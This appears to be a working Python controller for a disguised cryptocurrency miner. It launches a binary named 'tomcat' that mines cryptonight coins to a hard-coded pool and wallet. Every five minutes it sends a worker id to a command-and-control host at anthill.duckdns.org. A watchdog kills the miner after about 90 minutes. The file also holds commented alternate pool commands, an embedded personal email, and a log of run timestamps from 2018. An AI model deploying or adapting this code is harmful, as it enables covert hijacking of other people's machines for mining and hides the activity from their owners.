import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:07.752006
#2018-02-17 17:18:01.780243
#2018-02-17 19:06:06.290612
#2018-02-17 20:56:02.575433
#2018-02-17 22:42:01.487053
#2018-02-18 00:25:08.532683
#2018-02-18 02:16:06.253694
#2018-02-18 04:03:07.965145
#2018-02-18 05:52:03.571548
#2018-02-18 07:43:07.841091
#2018-02-18 09:31:04.931588
#2018-02-18 11:17:04.606230
#2018-02-18 13:03:04.287129
#2018-02-18 14:50:08.765722
#2018-02-18 16:38:06.175551
#2018-02-18 18:27:05.842756
#2018-02-18 20:13:06.633446
#2018-02-18 21:58:06.696303
#2018-02-18 23:47:04.792615
#2018-02-19 01:33:01.500789
#2018-02-19 03:21:06.228331
#2018-02-19 05:06:03.743502
#2018-02-19 06:52:05.174630
#2018-02-19 08:41:02.008880
#2018-02-19 10:30:09.856315
#2018-02-19 12:18:09.055418
#2018-02-19 14:05:07.257113
#2018-02-19 15:54:04.559358
#2018-02-19 17:43:08.439990
#2018-02-19 19:31:05.406261
#2018-02-19 21:18:04.334355
#2018-02-19 23:03:01.911956
#2018-02-20 00:46:06.515826
#2018-02-20 02:37:01.904937
#2018-02-20 04:26:06.352590
#2018-02-20 06:10:06.500673
#2018-02-20 07:55:05.452797
#2018-02-20 09:40:09.046684
#2018-02-20 11:24:07.873077
#2018-02-20 13:11:06.202983
#2018-02-20 14:58:06.725533
#2018-02-20 16:42:06.848696
#2018-02-20 18:31:07.546241
#2018-02-20 20:22:01.624469
#2018-02-20 22:09:05.902974
#2018-02-20 23:51:06.270498
#2018-02-21 01:36:06.319435
#2018-02-21 03:23:02.164730
#2018-02-21 05:11:04.070749
#2018-02-21 06:58:05.849700
#2018-02-21 08:45:02.195790
#2018-02-21 10:29:07.797769
#2018-02-21 12:17:02.211325
#2018-02-21 14:05:08.960646
#2018-02-21 15:52:10.188586
#2018-02-21 17:44:07.644766
#2018-02-21 19:31:08.422515
#2018-02-21 21:19:05.349231
#2018-02-21 23:07:05.994669
#2018-02-22 00:56:06.022038
#2018-02-22 02:43:07.249115
#2018-02-22 04:29:07.094419
#2018-02-22 06:14:08.255900
#2018-02-22 07:59:04.939838
#2018-02-22 09:48:02.240395
#2018-02-22 11:34:04.959296
#2018-02-22 13:21:06.698240
#2018-02-22 15:11:03.992044
#2018-02-22 16:54:05.066834
#2018-02-22 18:42:01.260099
#2018-02-22 20:35:09.568924
#2018-02-22 22:21:02.130395
#2018-02-23 00:09:05.775999
#2018-02-23 01:57:05.096974
#2018-02-23 03:45:05.623858
#2018-02-23 05:38:01.320643
#2018-02-23 07:23:06.405428
#2018-02-23 09:28:05.306271
#2018-02-23 11:33:06.314210
#2018-02-23 13:24:07.418392
#2018-02-23 15:10:09.696476
#2018-02-23 16:59:07.907266
#2018-02-23 18:46:01.934547
#2018-02-23 20:32:08.015466
#2018-02-23 22:20:02.869917
#2018-02-24 00:05:07.543574
#2018-02-24 01:56:01.382646
#2018-02-24 03:48:02.030660
#2018-02-24 05:32:05.709725
#2018-02-24 07:18:06.188974
#2018-02-24 09:08:07.228800
#2018-02-24 10:44:06.268162
#2018-02-24 12:29:07.546667
#2018-02-24 14:03:02.139080
#2018-02-24 15:37:04.073976
#2018-02-24 17:19:01.252181
#2018-02-24 18:50:07.863428
#2018-02-24 20:22:06.897858
#2018-02-24 21:51:03.639970
#2018-02-25 00:31:04.712768
#2018-02-25 02:37:06.183811
#2018-02-25 06:11:04.267980
#2018-02-25 11:39:05.080621